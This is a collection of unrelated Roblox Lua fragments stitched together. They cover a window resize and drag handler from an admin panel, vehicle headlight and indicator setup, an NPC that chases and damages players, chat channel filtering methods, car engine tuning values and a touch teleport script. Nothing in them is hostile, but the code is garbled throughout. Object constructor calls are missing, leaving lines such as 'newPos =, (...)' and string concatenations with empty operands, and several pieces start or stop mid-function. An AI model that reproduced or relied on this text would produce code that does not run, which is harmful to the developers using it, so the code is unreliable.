xPos) + startXSize -1 newY = (startYPos - yPos) + startYSize -1 moveY = true moveX = true elseif Resizing == "RightCorner" then newX = (xPos - startXPos) + 3 newY = (yPos - startYPos) + 3 elseif Resizing == "LeftCorner" then newX = (startXPos - xPos) + startXSize + 3 newY = (yPos - startYPos) + 3 moveX = true elseif Resizing == "LeftSide" then newX = (startXPos - xPos) + startXSize + 3 newY = startYSize moveX = true elseif Resizing == "RightSide" then newX = (xPos - startXPos) + 3 newY = startYSize elseif Resizing == "Bottom" then newX = startXSize newY = (yPos - startYPos) + 3 elseif Resizing == "Top" then newX = startXSize newY = (startYPos - yPos) + startYSize - 1 moveY = true end if newX < MinSize[1] then newX = MinSize[1] end if newY < MinSize[2] then newY = MinSize[2] end if newX > MaxSize[1] then newX = MaxSize[1] end if newY > MaxSize[2] then newY = MaxSize[2] end if moveX then newPos =, (startXPos+startXSize)-newX, newPos.Y.Scale, newPos.Y.Offset) end if moveY then newPos =, newPos.X.Offset, 0, (startYPos+startYSize)-newY) end Drag.Position = newPos Drag.Size =, newX, Drag.Size.Y.Scale, Drag.Size.Y.Offset) Main.Size =, Main.Size.X.Offset, 0, newY) if not Titlef.TextFits then Titlef.Visible = false else Titlef.Visible = true end else checkMouse(x, y) end end end Event(InputService.InputBegan, function(input, gameHandled) if not gameHandled and (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) then inputStart(Mouse.X, Mouse.Y) end end) Event(InputService.InputChanged, function(input, gameHandled) if input.UserInputType == Enum.UserInputType.MouseMovement or Enum.UserInputType.Touch then inputMoved(input.Position.X, input.Position.Y) end end) Event(InputService.InputEnded, function(input, gameHandled) if input.UserInputType == Enum.UserInputType.MouseButton1 or Enum.UserInputType.Touch then inputEnd() end end) --[[Event(Mouse.Button1Down, function() if gTable.Active and inFrame and not Resizing and not isInFrame(Mouse.X, Mouse.Y, ScrollFrame) and not isInFrame(Mouse.X, Mouse.Y, Drag) then Resizing = inFrame startXPos = Drag.AbsolutePosition.X startYPos = Drag.AbsolutePosition.Y startXSize = Drag.AbsoluteSize.X startYSize = Main.AbsoluteSize.Y checkMouse() end end) Event(Mouse.Button1Up, function() if gTable.Active then if Resizing and onResize then onResize(, Drag.Size.X.Offset, Main.Size.Y.Scale, Main.Size.Y.Offset)) end Resizing = nil Mouse.Icon = curIcon --if Walls then -- wallPosition() --end end end)--]] else LeftSizeIcon.Visible = false RightSizeIcon.Visible = false end Close.MouseButton1Down:Connect(doClose) Hide.MouseButton1Down:Connect(function() doHide() end) gTable.CustomDestroy = function() service.UnWrap(GUI):Destroy() if client.Variables.MouseLockedBy == gTable then Mouse.Icon = curIcon client.Variables.MouseLockedBy = nil end if not isClosed then isClosed = true if onClose then onClose() end end end for i,child in next,GUI:GetChildren() do if child.Name ~= "Desc" and child.Name ~= "Drag" then specialInsts[child.Name] = child child.Parent = nil end end --// Drag & DisplayOrder Handler do local windowValue ="BoolValue", GUI) local dragDragging = false local dragOffset local inFrame windowValue.Name = "__ADONIS_WINDOW" Event(Main.InputBegan, function(input) if gTable.Active and (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) then BringToFront() end end) Event(Drag.InputBegan, function(input) if gTable.Active then inFrame = true if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then BringToFront() end end end) Event(Drag.InputChanged, function(input) if gTable.Active then inFrame = true end end) Event(Drag.InputEnded, function(input) inFrame = false end) Event(InputService.InputBegan, function(input) if inFrame and GUI.DisplayOrder == 101 and not dragDragging and (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) then--isInFrame(input.Position.X, input.Position.Y, object) then dragDragging = true BringToFront() dragOffset = - input.Position.X, Drag.AbsolutePosition.Y - input.Position.Y) end end) Event(InputService.InputChanged, function(input) if dragDragging and (input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch) then Drag.Position =, dragOffset.X + input.Position.X, 0, dragOffset.Y + input.Position.Y) end end) Event(InputService.InputEnded, function(input) if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then dragDragging = false end end) end --// Finishing up local api = apiIfy(ScrollFrame, data) local meta = api:GetMetatable() local oldNewIndex = meta.__newindex local oldIndex = meta.__index create("ScrollingFrame", nil, ScrollFrame) LoadChildren(api, Content) api:SetSpecial("gTable", gTable) api:SetSpecial("Window", GUI) api:SetSpecial("Main", Main) api:SetSpecial("Title", Titlef) api:SetSpecial("Dragger", Drag) api:SetSpecial("Destroy", doClose) api:SetSpecial("Close", doClose) api:SetSpecial("Object", ScrollFrame) api:SetSpecial("Refresh", DoRefresh) api:SetSpecial("AddTitleButton", function(ignore, data) if type(ignore) == "table" and not data then data = ignore end return addTitleButton(data) end) api:SetSpecial("Ready", function() if onReady then onReady() end gTable.Ready() BringToFront() end) api:SetSpecial("BindEvent", function(ignore, ...) Event(...) end) api:SetSpecial("Hide", function(ignore, hide) doHide(hide) end) api:SetSpecial("SetTitle", function(ignore, newTitle) Titlef.Text = newTitle end) api:SetSpecial("SetPosition", function(ignore, newPos) setPosition(newPos) end) api:SetSpecial("SetSize", function(ignore, newSize) setSize(newSize) end) api:SetSpecial("GetPosition", function() return Drag.AbsolutePosition end) api:SetSpecial("GetSize", function() return Main.AbsoluteSize end) api:SetSpecial("IsVisible", isVisible) api:SetSpecial("IsClosed", isClosed) meta.__index = function(tab, ind) if ind == "IsVisible" then return isVisible() elseif ind == "Closed" then return isClosed else return oldIndex(tab, ind) end end setSize(Size) setPosition(Position) if Ready then gTable:Ready() BringToFront() end return api,GUI end
-- server side setup
local Pcolors = {{255, 255, 255}, {255, 180, 161}, {226, 220, 188}} local Lcolors = {{184, 191, 191}, {184, 191, 191}, {184, 191, 191}} local INDcolor = {255, 152, 92} local plactive = false local prevChild F.Setup = function(light_type, popups, tb, fog_color) event.IndicatorsAfterLeave.Disabled = true for idx, child in pairs(lights.Brake:GetChildren()) do if child.Name == "L" and #child:GetChildren() < 1 then local spot ="SpotLight", child) spot.Name = "L" spot.Brightness = 0 spot.Range = 0 spot.Face = Enum.NormalId.Back spot.Color = Color3.fromRGB(254, 29, 44) spot.Shadows = true elseif child.Name == "LN" then if child:IsA("MeshPart") then child.TextureID = "" end child.Material = Enum.Material.Neon child.Color = Color3.fromRGB(254, 29, 44) child.Transparency = 1 end end for idx, child in pairs(lights.Rear:GetChildren()) do if child.Name == "L" and #child:GetChildren() < 1 then local spot ="SpotLight", child) spot.Name = "L" spot.Brightness = 0 spot.Range = 0 spot.Face = Enum.NormalId.Back spot.Color = Color3.fromRGB(255, 62, 65) spot.Shadows = true elseif child.Name == "LN" then if child:IsA("MeshPart") then child.TextureID = "" end child.Material = Enum.Material.Neon child.Color = Color3.fromRGB(255, 62, 65) child.Transparency = 1 end end for idx, child in pairs(lights.Reverse:GetChildren()) do if child.Name == "L" and #child:GetChildren() < 1 then local spot ="SpotLight", child) spot.Name = "L" spot.Brightness = 0 spot.Range = 0 spot.Face = Enum.NormalId.Back spot.Color = Color3.fromRGB(255, 255, 255) spot.Shadows = true elseif child.Name == "LN" then if child:IsA("MeshPart") then child.TextureID = "" end child.Material = Enum.Material.Neon child.Color = Color3.fromRGB(255, 255, 255) child.Transparency = 1 end end for idx, child in pairs(lights.LeftInd:GetDescendants()) do if child.Name == "L" and child.Parent.Name == "Front" and #child:GetChildren() < 1 then local spot ="SpotLight", child) spot.Name = "L" spot.Brightness = 0 spot.Range = 0 spot.Face = Enum.NormalId.Front spot.Color = Color3.fromRGB(INDcolor[1], INDcolor[2], INDcolor[3]) spot.Shadows = true elseif child.Name == "L" and child.Parent.Name == "Rear" and #child:GetChildren() < 1 then local spot ="SpotLight", child) spot.Name = "L" spot.Brightness = 0 spot.Range = 0 spot.Face = Enum.NormalId.Back spot.Color = Color3.fromRGB(INDcolor[1], INDcolor[2], INDcolor[3]) spot.Shadows = true elseif child.Name == "L" and child.Parent.Name == "Side" and #child:GetChildren() < 1 then local spot ="SpotLight", child) spot.Name = "L" spot.Brightness = 0 spot.Range = 0 spot.Face = Enum.NormalId.Left spot.Color = Color3.fromRGB(INDcolor[1], INDcolor[2], INDcolor[3]) spot.Shadows = true elseif child.Name == "LN" then if child:IsA("MeshPart") then child.TextureID = "" end child.Material = Enum.Material.Neon child.Color = Color3.fromRGB(INDcolor[1], INDcolor[2], INDcolor[3]) child.Transparency = 1 elseif string.sub(child.Name, 1, 2) == "SI" then if child:IsA("MeshPart") then child.TextureID = "" end child.Material = Enum.Material.Neon child.Color = Color3.fromRGB(INDcolor[1], INDcolor[2], INDcolor[3]) child.Transparency = 1 end end for idx, child in pairs(lights.RightInd:GetDescendants()) do if child.Name == "L" and child.Parent.Name == "Front" and #child:GetChildren() < 1 then local spot ="SpotLight", child) spot.Name = "L" spot.Brightness = 0 spot.Range = 0 spot.Face = Enum.NormalId.Front spot.Color = Color3.fromRGB(INDcolor[1], INDcolor[2], INDcolor[3]) spot.Shadows = true elseif child.Name == "L" and child.Parent.Name == "Rear" and #child:GetChildren() < 1 then local spot ="SpotLight", child) spot.Name = "L" spot.Brightness = 0 spot.Range = 0 spot.Face = Enum.NormalId.Back spot.Color = Color3.fromRGB(INDcolor[1], INDcolor[2], INDcolor[3]) spot.Shadows = true elseif child.Name == "L" and child.Parent.Name == "Side" and #child:GetChildren() < 1 then local spot ="SpotLight", child) spot.Name = "L" spot.Brightness = 0 spot.Range = 0 spot.Face = Enum.NormalId.Right spot.Color = Color3.fromRGB(INDcolor[1], INDcolor[2], INDcolor[3]) spot.Shadows = true elseif child.Name == "LN" then if child:IsA("MeshPart") then child.TextureID = "" end child.Material = Enum.Material.Neon child.Color = Color3.fromRGB(INDcolor[1], INDcolor[2], INDcolor[3]) child.Transparency = 1 elseif string.sub(child.Name, 1, 2) == "SI" then if child:IsA("MeshPart") then child.TextureID = "" end child.Material = Enum.Material.Neon child.Color = Color3.fromRGB(INDcolor[1], INDcolor[2], INDcolor[3]) child.Transparency = 1 end end for idx, child in pairs(tb) do child.ImageTransparency = 1 end if not popups then if light_type == "Pure White" then for idx, child in pairs(lights.Headlights:GetDescendants()) do if child.Name == "L" and #child:GetChildren() < 1 then local spot ="SpotLight", child) spot.Name = "L" spot.Brightness = 0 spot.Range = 0 spot.Face = Enum.NormalId.Front spot.Color = Color3.fromRGB(Lcolors[1][1], Lcolors[1][2], Lcolors[1][3]) spot.Shadows = true elseif child.Name == "LN" then if child:IsA("MeshPart") then child.TextureID = "" end child.Material = Enum.Material.Neon child.Color = Color3.fromRGB(Pcolors[1][1], Pcolors[1][2], Pcolors[1][3]) child.Transparency = 1 end end elseif light_type == "OEM White" then for idx, child in pairs(lights.Headlights:GetDescendants()) do if child.Name == "L" and #child:GetChildren() < 1 then local spot ="SpotLight", child) spot.Name = "L" spot.Brightness = 0 spot.Range = 0 spot.Face = Enum.NormalId.Front spot.Color = Color3.fromRGB(Lcolors[2][1], Lcolors[2][2], Lcolors[2][3]) spot.Shadows = true elseif child.Name == "LN" then if child:IsA("MeshPart") then child.TextureID = "" end child.Material = Enum.Material.Neon child.Color = Color3.fromRGB(Pcolors[2][1], Pcolors[2][2], Pcolors[2][3]) child.Transparency = 1 end end elseif light_type == "Xenon" then for idx, child in pairs(lights.Headlights:GetDescendants()) do if child.Name == "L" and #child:GetChildren() < 1 then local spot ="SpotLight", child) spot.Name = "L" spot.Brightness = 0 spot.Range = 0 spot.Face = Enum.NormalId.Front spot.Color = Color3.fromRGB(Lcolors[3][1], Lcolors[3][2], Lcolors[3][3]) spot.Shadows = true elseif child.Name == "LN" then if child:IsA("MeshPart") then child.TextureID = "" end child.Material = Enum.Material.Neon child.Color = Color3.fromRGB(Pcolors[3][1], Pcolors[3][2], Pcolors[3][3]) child.Transparency = 1 end end end else if light_type == "Pure White" then for idx, child in pairs(PHeadlights.Parts.Headlights:GetChildren()) do if child.Name == "L" and #child:GetChildren() < 1 then local spot ="SpotLight", child) spot.Name = "L" spot.Brightness = 0 spot.Range = 0 spot.Face = Enum.NormalId.Front spot.Color = Color3.fromRGB(Lcolors[1][1], Lcolors[1][2], Lcolors[1][3]) spot.Shadows = true elseif child.Name == "LN" then if child:IsA("MeshPart") then child.TextureID = "" end child.Material = Enum.Material.Neon child.Color = Color3.fromRGB(Pcolors[1][1], Pcolors[1][2], Pcolors[1][3]) child.Transparency = 1 end end elseif light_type == "OEM White" then for idx, child in pairs(PHeadlights.Parts.Headlights:GetChildren()) do if child.Name == "L" and #child:GetChildren() < 1 then local spot ="SpotLight", child) spot.Name = "L" spot.Brightness = 0 spot.Range = 0 spot.Face = Enum.NormalId.Front spot.Color = Color3.fromRGB(Lcolors[2][1], Lcolors[2][2], Lcolors[2][3]) spot.Shadows = true elseif child.Name == "LN" then if child:IsA("MeshPart") then child.TextureID = "" end child.Material = Enum.Material.Neon child.Color = Color3.fromRGB(Pcolors[2][1], Pcolors[2][2], Pcolors[2][3]) child.Transparency = 1 end end elseif light_type == "Xenon" then for idx, child in pairs(PHeadlights.Parts.Headlights:GetChildren()) do if child.Name == "L" and #child:GetChildren() < 1 then local spot ="SpotLight", child) spot.Name = "L" spot.Brightness = 0 spot.Range = 0 spot.Face = Enum.NormalId.Front spot.Color = Color3.fromRGB(Lcolors[3][1], Lcolors[3][2], Lcolors[3][3]) spot.Shadows = true elseif child.Name == "LN" then if child:IsA("MeshPart") then child.TextureID = "" end child.Material = Enum.Material.Neon child.Color = Color3.fromRGB(Pcolors[3][1], Pcolors[3][2], Pcolors[3][3]) child.Transparency = 1 end end end end for idx, child in pairs(lights.Fog:GetChildren()) do if child.Name == "L" then local spot ="SpotLight", child) spot.Name = "L" spot.Brightness = 0 spot.Range = 0 spot.Face = Enum.NormalId.Front spot.Color = fog_color spot.Shadows = true elseif child.Name == "LN" then if child:IsA("MeshPart") then child.TextureID = "" end child.Material = Enum.Material.Neon child.Color = fog_color child.Transparency = 1 end end print("EpicLights Version 2 // Setup completed!") end
-- declarations
local Torso=waitForChild(sp,"Torso") local Head=waitForChild(sp,"Head") local RightShoulder=waitForChild(Torso,"Right Shoulder") local LeftShoulder=waitForChild(Torso,"Left Shoulder") local RightHip=waitForChild(Torso,"Right Hip") local LeftHip=waitForChild(Torso,"Left Hip") local Neck=waitForChild(Torso,"Neck") local Humanoid=waitForChild(sp,"Humanoid") local pose="Standing" local hitsound=waitForChild(Torso,"HitSound") local sounds={ waitForChild(Torso,"Ghost1Sound"), waitForChild(Torso,"Ghost2Sound"), } if healthregen then local regenscript=waitForChild(sp,"HealthRegenerationScript") regenscript.Disabled=false end Humanoid.WalkSpeed=wonderspeed local toolAnim="None" local toolAnimTime=0 function onRunning(speed) if speed>0 then pose="Running" else pose="Standing" end end function onDied() pose="Dead" end function onJumping() pose="Jumping" end function onClimbing() pose="Climbing" end function onGettingUp() pose = "GettingUp" end function onFreeFall() pose = "FreeFall" end function onFallingDown() pose = "FallingDown" end function onSeated() pose = "Seated" end function onPlatformStanding() pose = "PlatformStanding" end function moveJump() RightShoulder.MaxVelocity = 0.5 LeftShoulder.MaxVelocity = 0.5 RightShoulder.DesiredAngle=3.14 LeftShoulder.DesiredAngle=-3.14 RightHip.DesiredAngle=0 LeftHip.DesiredAngle=0 end function moveFreeFall() RightShoulder.MaxVelocity = 0.5 LeftShoulder.MaxVelocity =0.5 RightShoulder.DesiredAngle=3.14 LeftShoulder.DesiredAngle=-3.14 RightHip.DesiredAngle=0 LeftHip.DesiredAngle=0 end function moveSit() RightShoulder.MaxVelocity = 0.15 LeftShoulder.MaxVelocity = 0.15 RightShoulder.DesiredAngle=3.14 /2 LeftShoulder.DesiredAngle=-3.14 /2 RightHip.DesiredAngle=3.14 /2 LeftHip.DesiredAngle=-3.14 /2 end function animate(time) local amplitude local frequency if (pose == "Jumping") then moveJump() return end if (pose == "FreeFall") then moveFreeFall() return end if (pose == "Seated") then moveSit() return end local climbFudge = 0 if (pose == "Running") then RightShoulder.MaxVelocity = 0.15 LeftShoulder.MaxVelocity = 0.15 amplitude = 1 frequency = 9 elseif (pose == "Climbing") then RightShoulder.MaxVelocity = 0.5 LeftShoulder.MaxVelocity = 0.5 amplitude = 1 frequency = 9 climbFudge = 3.14 else amplitude = 0.1 frequency = 1 end desiredAngle = amplitude * math.sin(time*frequency) if not chasing and frequency==9 then frequency=4 end if chasing then RightShoulder.DesiredAngle=math.pi/2 LeftShoulder.DesiredAngle=-math.pi/2 RightHip.DesiredAngle=-desiredAngle*2 LeftHip.DesiredAngle=-desiredAngle*2 else RightShoulder.DesiredAngle=desiredAngle + climbFudge LeftShoulder.DesiredAngle=desiredAngle - climbFudge RightHip.DesiredAngle=-desiredAngle LeftHip.DesiredAngle=-desiredAngle end end function attack(time,attackpos) if time-lastattack>=1 then local hit,pos=raycast(Torso.Position,(attackpos-Torso.Position).unit,attackrange) if hit and hit.Parent~=nil and hit.Parent.Name~=sp.Name then local h=hit.Parent:FindFirstChild("Humanoid") if h then local creator=sp:FindFirstChild("creator") if creator then if creator.Value~=nil then if creator.Value~=game.Players:GetPlayerFromCharacter(h.Parent) then for i,oldtag in ipairs(h:GetChildren()) do if oldtag.Name=="creator" then oldtag:remove() end end creator:clone().Parent=h else return end end end h:TakeDamage(damage) hitsound.Volume=.5+(.5*math.random()) hitsound.Pitch=.5+math.random() hitsound:Play() if RightShoulder and LeftShoulder then RightShoulder.CurrentAngle=0 LeftShoulder.CurrentAngle=0 end end end lastattack=time end end Humanoid.Died:connect(onDied) Humanoid.Running:connect(onRunning) Humanoid.Jumping:connect(onJumping) Humanoid.Climbing:connect(onClimbing) Humanoid.GettingUp:connect(onGettingUp) Humanoid.FreeFalling:connect(onFreeFall) Humanoid.FallingDown:connect(onFallingDown) Humanoid.Seated:connect(onSeated) Humanoid.PlatformStanding:connect(onPlatformStanding) function populatehumanoids(mdl) if mdl.ClassName=="Humanoid" then table.insert(humanoids,mdl) end for i2,mdl2 in ipairs(mdl:GetChildren()) do populatehumanoids(mdl2) end end function playsound(time) nextsound=time+5+(math.random()*5) local randomsound=sounds[math.random(1,#sounds)] randomsound.Volume=1 randomsound.Pitch=1 randomsound:Play() end while sp.Parent~=nil and Humanoid and Humanoid.Parent~=nil and Humanoid.Health>0 and Torso and Head and Torso~=nil and Torso.Parent~=nil do local _,time=wait(1/3) humanoids={} populatehumanoids(game.Workspace) closesttarget=nil closestdist=sightrange local creator=sp:FindFirstChild("creator") for i,h in ipairs(humanoids) do if h and h.Parent~=nil then if h.Health>0 and h.Parent.Name~=sp.Name and h.Parent~=sp then local plr=game.Players:GetPlayerFromCharacter(h.Parent) if creator==nil or plr==nil or creator.Value~=plr then local t=h.Parent:FindFirstChild("Torso") if t~=nil then local dist=(t.Position-Torso.Position).magnitude if dist<closestdist then closestdist=dist closesttarget=t end end end end end end if closesttarget~=nil then if not chasing then playsound(time) chasing=true Humanoid.WalkSpeed=runspeed end Humanoid:MoveTo(closesttarget.Position+(,1,1)*(variance*((math.random()*2)-1))),closesttarget) if math.random()<.5 then attack(time,closesttarget.Position) end else if chasing then chasing=false Humanoid.WalkSpeed=wonderspeed end if time>nextrandom then nextrandom=time+3+(math.random()*5) local randompos=Torso.Position+((,1,1)*math.random(),.5,.5))*40) Humanoid:MoveTo(randompos,game.Workspace.Terrain) end end if time>nextsound then playsound(time) end if time>nextjump then nextjump=time+7+(math.random()*5) Humanoid.Jump=true end animate(time) end if sp~=nil then for i,v in ipairs(sp:GetChildren()) do if v.className=="Part" then v.CanCollide=false end end end wait(4) sp:remove() --Rest In Pizza
--///////////////// Internal-Use Methods --//////////////////////////////////////
function methods:InternalDestroy() for i, speaker in pairs(self.Speakers) do speaker:LeaveChannel(self.Name) end self.eDestroyed:Fire() self.eDestroyed:Destroy() self.eMessagePosted:Destroy() self.eSpeakerJoined:Destroy() self.eSpeakerLeft:Destroy() self.eSpeakerMuted:Destroy() self.eSpeakerUnmuted:Destroy() end function methods:InternalDoMessageFilter(speakerName, messageObj, channel) local filtersIterator = self.FilterMessageFunctions:GetIterator() for funcId, func, priority in filtersIterator do local success, errorMessage = pcall(function() func(speakerName, messageObj, channel) end) if not success then warn(string.format("DoMessageFilter Function '%s' failed for reason: %s", funcId, errorMessage)) end end end function methods:InternalDoProcessCommands(speakerName, message, channel) local commandsIterator = self.ProcessCommandsFunctions:GetIterator() for funcId, func, priority in commandsIterator do local success, returnValue = pcall(function() local ret = func(speakerName, message, channel) if type(ret) ~= "boolean" then error("Process command functions must return a bool") end return ret end) if not success then warn(string.format("DoProcessCommands Function '%s' failed for reason: %s", funcId, returnValue)) elseif returnValue then return true end end return false end function methods:InternalPostMessage(fromSpeaker, message, extraData) if (self:InternalDoProcessCommands(fromSpeaker.Name, message, self.Name)) then return false end if (self.Mutes[fromSpeaker.Name:lower()] ~= nil) then local t = self.Mutes[fromSpeaker.Name:lower()] if (t > 0 and os.time() > t) then self:UnmuteSpeaker(fromSpeaker.Name) else self:SendSystemMessageToSpeaker(ChatLocalization:FormatMessageToSend("GameChat_ChatChannel_MutedInChannel","You are muted and cannot talk in this channel"), fromSpeaker.Name) return false end end local messageObj = self:InternalCreateMessageObject(message, fromSpeaker.Name, false, extraData) -- allow server to process the unfiltered message string messageObj.Message = message local processedMessage pcall(function() processedMessage = Chat:InvokeChatCallback(Enum.ChatCallbackType.OnServerReceivingMessage, messageObj) end) messageObj.Message = nil if processedMessage then -- developer server code's choice to mute the message if processedMessage.ShouldDeliver == false then return false end messageObj = processedMessage end message = self:SendMessageObjToFilters(message, messageObj, fromSpeaker) local sentToList = {} for i, speaker in pairs(self.Speakers) do local isMuted = speaker:IsSpeakerMuted(fromSpeaker.Name) if not isMuted and self:CanCommunicate(fromSpeaker, speaker) then table.insert(sentToList, speaker.Name) if speaker.Name == fromSpeaker.Name then -- Send unfiltered message to speaker who sent the message. local cMessageObj = ShallowCopy(messageObj) if userShouldMuteUnfilteredMessage then cMessageObj.Message = string.rep("_", messageObj.MessageLength) else cMessageObj.Message = message end cMessageObj.IsFiltered = true -- We need to claim the message is filtered even if it not in this case for compatibility with legacy client side code. speaker:InternalSendMessage(cMessageObj, self.Name) else speaker:InternalSendMessage(messageObj, self.Name) end end end local success, err = pcall(function() self.eMessagePosted:Fire(messageObj) end) if not success and err then print("Error posting message: " ..err) end --// START FFLAG if (not IN_GAME_CHAT_USE_NEW_FILTER_API) then --// USES FFLAG --// OLD BEHAVIOR local filteredMessages = {} for i, speakerName in pairs(sentToList) do local filteredMessage = self.ChatService:InternalApplyRobloxFilter(messageObj.FromSpeaker, message, speakerName) if filteredMessage then filteredMessages[speakerName] = filteredMessage else return false end end for i, speakerName in pairs(sentToList) do local speaker = self.Speakers[speakerName] if (speaker) then local cMessageObj = ShallowCopy(messageObj) cMessageObj.Message = filteredMessages[speakerName] cMessageObj.IsFiltered = true speaker:InternalSendFilteredMessage(cMessageObj, self.Name) end end local filteredMessage = self.ChatService:InternalApplyRobloxFilter(messageObj.FromSpeaker, message) if filteredMessage then messageObj.Message = filteredMessage else return false end messageObj.IsFiltered = true self:InternalAddMessageToHistoryLog(messageObj) --// OLD BEHAVIOR else --// NEW BEHAVIOR local textFilterContext = self.Private and Enum.TextFilterContext.PrivateChat or Enum.TextFilterContext.PublicChat local filterSuccess, isFilterResult, filteredMessage = self.ChatService:InternalApplyRobloxFilterNewAPI( messageObj.FromSpeaker, message, textFilterContext ) if (filterSuccess) then messageObj.FilterResult = filteredMessage messageObj.IsFilterResult = isFilterResult else return false end messageObj.IsFiltered = true self:InternalAddMessageToHistoryLog(messageObj) for _, speakerName in pairs(sentToList) do local speaker = self.Speakers[speakerName] if (speaker) then speaker:InternalSendFilteredMessageWithFilterResult(messageObj, self.Name) end end --// NEW BEHAVIOR end --// END FFLAG -- One more pass is needed to ensure that no speakers do not recieve the message. -- Otherwise a user could join while the message is being filtered who had not originally been sent the message. local speakersMissingMessage = {} for _, speaker in pairs(self.Speakers) do local isMuted = speaker:IsSpeakerMuted(fromSpeaker.Name) if not isMuted and self:CanCommunicate(fromSpeaker, speaker) then local wasSentMessage = false for _, sentSpeakerName in pairs(sentToList) do if speaker.Name == sentSpeakerName then wasSentMessage = true break end end if not wasSentMessage then table.insert(speakersMissingMessage, speaker.Name) end end end --// START FFLAG if (not IN_GAME_CHAT_USE_NEW_FILTER_API) then --// USES FFLAG --// OLD BEHAVIOR for _, speakerName in pairs(speakersMissingMessage) do local speaker = self.Speakers[speakerName] if speaker then local filteredMessage = self.ChatService:InternalApplyRobloxFilter(messageObj.FromSpeaker, message, speakerName) if filteredMessage == nil then return false end local cMessageObj = ShallowCopy(messageObj) cMessageObj.Message = filteredMessage cMessageObj.IsFiltered = true speaker:InternalSendFilteredMessage(cMessageObj, self.Name) end end --// OLD BEHAVIOR else --// NEW BEHAVIOR for _, speakerName in pairs(speakersMissingMessage) do local speaker = self.Speakers[speakerName] if speaker then speaker:InternalSendFilteredMessageWithFilterResult(messageObj, self.Name) end end --// NEW BEHAVIOR end --// END FFLAG return messageObj end function methods:InternalAddSpeaker(speaker) if (self.Speakers[speaker.Name]) then warn("Speaker \"" .. .. "\" is already in the channel!") return end self.Speakers[speaker.Name] = speaker local success, err = pcall(function() self.eSpeakerJoined:Fire(speaker.Name) end) if not success and err then print("Error removing channel: " ..err) end end function methods:InternalRemoveSpeaker(speaker) if (not self.Speakers[speaker.Name]) then warn("Speaker \"" .. .. "\" is not in the channel!") return end self.Speakers[speaker.Name] = nil local success, err = pcall(function() self.eSpeakerLeft:Fire(speaker.Name) end) if not success and err then print("Error removing speaker: " ..err) end end function methods:InternalRemoveExcessMessagesFromLog() local remove = table.remove while (#self.ChatHistory > self.MaxHistory) do remove(self.ChatHistory, 1) end end function methods:InternalAddMessageToHistoryLog(messageObj) table.insert(self.ChatHistory, messageObj) self:InternalRemoveExcessMessagesFromLog() end function methods:GetMessageType(message, fromSpeaker) if fromSpeaker == nil then return ChatConstants.MessageTypeSystem end return ChatConstants.MessageTypeDefault end function methods:InternalCreateMessageObject(message, fromSpeaker, isFiltered, extraData) local messageType = self:GetMessageType(message, fromSpeaker) local speakerUserId = -1 local speaker = nil if fromSpeaker then speaker = self.Speakers[fromSpeaker] if speaker then local player = speaker:GetPlayer() if player then speakerUserId = player.UserId else speakerUserId = 0 end end end local messageObj = { ID = self.ChatService:InternalGetUniqueMessageId(), FromSpeaker = fromSpeaker, SpeakerUserId = speakerUserId, OriginalChannel = self.Name, MessageLength = string.len(message), MessageType = messageType, IsFiltered = isFiltered, Message = isFiltered and message or nil, --// These two get set by the new API. The comments are just here --// to remind readers that they will exist so it's not super --// confusing if they find them in the code but cannot find them --// here. --FilterResult = nil, --IsFilterResult = false, Time = os.time(), ExtraData = {}, } if speaker then for k, v in pairs(speaker.ExtraData) do messageObj.ExtraData[k] = v end end if (extraData) then for k, v in pairs(extraData) do messageObj.ExtraData[k] = v end end return messageObj end function methods:SetChannelNameColor(color) self.ChannelNameColor = color for i, speaker in pairs(self.Speakers) do speaker:UpdateChannelNameColor(self.Name, color) end end function methods:GetWelcomeMessageForSpeaker(speaker) if self.GetWelcomeMessageFunction then local welcomeMessage = self.GetWelcomeMessageFunction(speaker) if welcomeMessage then return welcomeMessage end end return self.WelcomeMessage end function methods:RegisterGetWelcomeMessageFunction(func) if type(func) ~= "function" then error("RegisterGetWelcomeMessageFunction must be called with a function.") end self.GetWelcomeMessageFunction = func end function methods:UnRegisterGetWelcomeMessageFunction() self.GetWelcomeMessageFunction = nil end
-- Place in StarterGui.
local message = script.Chat local color = script.Color game:GetService("StarterGui"):SetCore("ChatMakeSystemMessage",{ Text = (message.Value); Color = color.Value; Font = Enum.Font.SourceSansBold; FontSize = Enum.FontSize.Size18; })
----- Connections -----
CreateSellListener() Remotes.SellSpeed.OnServerEvent:Connect(SellSpeed)
--Torque Curve Tune.Horsepower = 220*1.3 -- [TORQUE CURVE VISUAL] Tune.IdleRPM = 750 -- Tune.PeakRPM = 1600 -- Use sliders to manipulate values Tune.Redline = 1800 -- Copy and paste slider values into the respective tune values Tune.EqPoint = 1400 Tune.PeakSharpness = 5 Tune.CurveMult = 0.5 --Incline Compensation Tune.InclineComp = 1.7 -- Torque compensation multiplier for inclines (applies gradient from 0-90 degrees) --Misc Tune.RevAccel = 150 -- RPM acceleration when clutch is off Tune.RevDecay = 75 -- RPM decay when clutch is off Tune.RevBounce = 500 -- RPM kickback from redline Tune.IdleThrottle = 3 -- Percent throttle at idle Tune.ClutchTol = 500 -- Clutch engagement threshold (higher = faster response)
-- Made by UncRepresentingWAF
local Teleport = "Cuff TP" --Put the name of the Part between the quotation marks. function Touch(hit) if script.Parent.Locked == false and script.Parent.Parent:findFirstChild(Teleport).Locked == false then script.Parent.Locked = true script.Parent.Parent:findFirstChild(Teleport).Locked = true --Checks Debounce. local Pos = script.Parent.Parent:findFirstChild(Teleport) hit.Parent:moveTo(Pos.Position) wait(1) script.Parent.Locked = false script.Parent.Parent:findFirstChild(Teleport).Locked = false end end script.Parent.Touched:connect(Touch)
--[[ Merges dictionary-like tables together. ]]
function Immutable.JoinDictionaries(...) local result = {} for i = 1, select("#", ...) do local dictionary = select(i, ...) for key, value in next, dictionary do result[key] = value end end return result end
-- AdornmentData type
type AdornmentData = VisualizerCache.AdornmentData
